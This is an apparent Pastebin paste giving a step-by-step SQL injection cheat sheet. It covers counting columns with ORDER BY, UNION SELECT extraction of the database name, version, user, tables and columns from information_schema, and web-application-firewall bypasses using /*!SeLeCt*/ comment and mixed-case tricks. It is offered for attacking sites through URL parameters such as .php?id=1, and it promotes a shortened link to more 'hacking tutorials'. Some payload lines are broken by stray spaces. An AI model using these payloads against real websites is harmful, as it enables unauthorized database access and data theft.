Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- for more exclusive hacking tutorials visit : http://bit.ly/1Mfv5G3
- ==============================
- SqL Injection Commad
- ==============================
- Get Columns Number
- ==============================
- +order+by+
- ==============================
- get infected column
- ==============================
- +union+select+
- ==============================
- Get database name
- ==============================
- Database()
- ==============================
- Get database version
- ==============================
- Version()
- ==============================
- get database user
- User()
- ==============================
- get all tables
- ==============================
- Place this command on the infected collum
- ==============================
- group_concat(table_name)
- ==============================
- place this command on the final of the url
- ==============================
- +from+information_schema.tables+where+table_schema =database()--
- ==============================
- get all columns
- ==============================
- Place this command on the infected collum
- ==============================
- group_concat(column_name)
- ==============================
- place this one on the final of the link
- ==============================
- +from+information_schema.columns+where+table_schem a=database()--
- ==============================
- Bypass WAD
- ==============================
- Union Select WAF bypass
- ==============================
- Add this filter
- ==============================
- /*! */
- ==============================
- to
- ==============================
- select
- ==============================
- to be
- ==============================
- /*!select*/
- ==============================
- if it was not successfully change this
- ==============================
- select
- ==============================
- to
- ==============================
- /*!SeLeCt*/
- ==============================
- Capital and small letters
- ==============================
- Bypass WAF when getting tables
- ==============================
- Change this
- ==============================
- select
- ==============================
- to this
- ==============================
- /*!SeLeCt*/
- ==============================
- and this
- ==============================
- group_concat(table_name)
- ==============================
- to this
- ==============================
- /*!GrOuP_CoNcAT(table_name)*/
- ==============================
- and place this on the finish of the url
- ==============================
- +from+information_schema.tables+where+table_schema =database()--
- ==============================
- Bypass WAF when getting Columns
- ==============================
- change this
- ==============================
- select
- ==============================
- to this
- ==============================
- /*!SeLeCt*/
- ==============================
- change this
- ==============================
- group_concat(column_name)
- ==============================
- to this
- ==============================
- /*!GrOuP_CoNcAT(column_name)*/
- ==============================
- and place this on the final of the link
- ==============================
- +from+information_schema.columns+where+table_schem a=database()--
- ==============================
- to be like this
- ==============================
- +
- ==============================
- from+information_schema./*!columns*/+where+table_schema=database()--
- ==============================
- Additional command for waf bypass
- ==============================
- place this on the infected collumn
- ==============================
- concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema))))
- ==============================
- and place this on the finish of the link
- ==============================
- +from+information_schema.columns--
- ==============================
- columns number can't be shown ?
- ==============================
- add this
- ==============================
- +--+
- ==============================
- to the finish of the url
- ==============================
- and add this
- ==============================
- '
- ==============================
- after
- ==============================
- .php?id=1
- ==============================
- to be like this
- ==============================
- .php?id=1'
- ==============================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement